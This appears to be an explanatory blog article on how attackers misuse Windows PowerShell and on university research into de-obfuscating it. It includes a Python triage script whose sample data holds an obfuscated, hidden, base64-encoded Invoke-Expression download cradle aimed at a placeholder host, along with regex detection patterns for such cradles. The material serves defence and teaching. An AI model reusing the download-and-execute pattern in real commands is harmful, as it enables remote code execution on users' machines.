Microsoft PowerShell and the new frontiers of malware

(by Davide Maiorca)
16/06/21

Most Microsoft Windows users (system administrators in particular) will have heard at least once of Windows PowerShell, a command interpreter (more properly a "shell", much like Bash on Linux) through which it is possible to "drive" various functions of the operating system: copying and moving files, downloading applications remotely, and also checking the list of services currently running. PowerShell commands are also called cmdlets, and each combines what would typically be several functions into a single command. For example, the cmdlet ConvertTo-XML creates an XML representation of an object.

What is certainly less well known, even to insiders, is that PowerShell is often used to carry out malicious functionality. The idea is simple: the features offered by the shell allow advanced system commands to be executed, and these can also harm the system itself when used improperly (for example, loading additional files into memory or downloading malicious files from the network). For an attacker this is a huge advantage over traditional vulnerability exploitation techniques, which execute malicious code by exploiting vulnerabilities in programs already present on the target machine (typically out-of-date ones). Through PowerShell, therefore, there is no need to exploit application-specific or operating-system-specific vulnerabilities: the attack can be carried out directly.

PowerShell is often used indirectly through infection vectors, frequently Word and Excel files. These files can contain macros, that is, automated procedures that normally should make writing documents or spreadsheets easier (for example, filling in certain cells automatically or performing calculations across several cells). Here too, macros are often used in entirely "benign" contexts, but they can implement functions that generate PowerShell code. PowerShell can also be used directly, for instance by creating a reverse shell that gives an attacker access to its full functionality.

Another feature of PowerShell code is its ability to "hide" from the eyes of an analyst, so that its actions are not evident. This feature is called obfuscation: it is possible to take some very simple code and complicate it enormously without changing its semantics (that is, the program behaves exactly as the non-obfuscated version does).

To analyze and counter obfuscated PowerShell malware, scientific research has made great strides in recent years. In particular, two studies from the University of Cagliari [1,2] have developed efficient techniques to de-obfuscate these attacks, including an open-source tool called PowerDecode, which is able to recover the original PowerShell code from its obfuscated variant. PowerDecode can be downloaded freely [3].
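The two ideas above, obfuscation that preserves semantics and de-obfuscation that peels it away again before detection logic is applied, can be illustrated with a small Python script. This is an added example written for this article; it is not PowerDecode and not code from the University of Cagliari. It handles only two textbook layers (the base64-over-UTF-16LE form that PowerShell's -EncodedCommand switch accepts, and string-literal concatenation such as 'Inv'+'oke'), then runs a handful of static indicators a defender would check over the readable text. The log lines, the indicator names and the http://example.invalid URL are all constructed for the example; real tooling covers many more obfuscation layers than this.

```python
"""Toy de-obfuscation and triage of PowerShell command lines (added example, not PowerDecode)."""
import base64
import re

# Indicators a defender commonly checks once the script text is readable.
# The indicator names are constructed for this example.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.IGNORECASE),
    "web-download": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.IGNORECASE),
    "hidden-window": re.compile(r"-WindowStyle\s+Hidden", re.IGNORECASE),
    "base64-decode": re.compile(r"FromBase64String", re.IGNORECASE),
}

# Common spellings of the -EncodedCommand switch followed by a base64 blob.
# The \s+ keeps unrelated switches such as -eq or -ExecutionPolicy from matching.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Two adjacent single-quoted literals joined with '+'.
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def encode_command(script: str) -> str:
    """Produce the form -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse encode_command; raises ValueError on malformed input."""
    return base64.b64decode(blob).decode("utf-16-le")


def collapse_concatenation(script: str) -> str:
    """Join 'a'+'b' literal pairs repeatedly until the text stops changing."""
    while True:
        joined = CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
        if joined == script:
            return joined
        script = joined


def peel_layers(cmdline: str, max_depth: int = 5) -> list:
    """Return the command line followed by each decoded layer found inside it."""
    layers = [cmdline]
    current = cmdline
    for _ in range(max_depth):
        match = ENCODED_ARG.search(current)
        if not match:
            break
        try:
            current = decode_command(match.group(1))
        except ValueError:  # not valid base64 / UTF-16LE: stop peeling
            break
        current = collapse_concatenation(current)
        layers.append(current)
    return layers


def analyze(cmdline: str) -> dict:
    """De-obfuscate, then report which indicators fire on the readable script."""
    layers = peel_layers(cmdline)
    final = collapse_concatenation(layers[-1])
    # The outer command line is checked too: -WindowStyle Hidden lives there.
    hits = sorted(name for name, rx in INDICATORS.items()
                  if rx.search(final) or rx.search(cmdline))
    return {"layers": len(layers), "script": final, "indicators": hits}


# Constructed sample process-creation log lines (not taken from any real system).
PLAIN = "Get-Service | Where-Object Status -eq 'Running'"
# A cmdlet name split into concatenated literals, then base64-encoded; the URL is a placeholder.
OBFUSCATED_SCRIPT = ("&('Inv'+'oke-Expr'+'ession') "
                     "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')")
SAMPLE_LOG_LINES = [
    "powershell.exe -NoProfile -Command " + PLAIN,
    "powershell.exe -NonInteractive -WindowStyle Hidden -enc " + encode_command(OBFUSCATED_SCRIPT),
]

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        report = analyze(line)
        print(f"layers={report['layers']} indicators={report['indicators']}")
        print("  script:", report["script"])
```

The benign first line yields one layer and no indicators; the second line decodes to two layers, the concatenated literals collapse to Invoke-Expression, and three indicators fire. Note that none of the indicators would have matched the raw log line before de-obfuscation, which is exactly why a decoding step has to precede signature-style detection.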

PowerShell malware therefore constitutes a significant risk for Windows systems, especially when it is loaded from Office documents. Research is nonetheless active in proposing ever more efficient solutions for analyzing and detecting this category of attack.

References

[1] D. Ugarte, D. Maiorca, F. Cara and G. Giacinto. PowerDrive: Accurate De-Obfuscation and Analysis of PowerShell Malware. In 16th Conference on Detection of Intrusions and Malware & Vulnerability Assessment (DIMVA), Springer, Gothenburg, Sweden, pp. 240-259, 2019.

[2] GM Malandrone, G. Virdis, G. Giacinto and D. Maiorca. PowerDecode: a PowerShell Script Decoder Dedicated to Malware Analysis. In 5th Italian Conference on CyberSecurity (ITASEC), 2021.

[3] PowerDecode. https://github.com/Malandrone/PowerDecode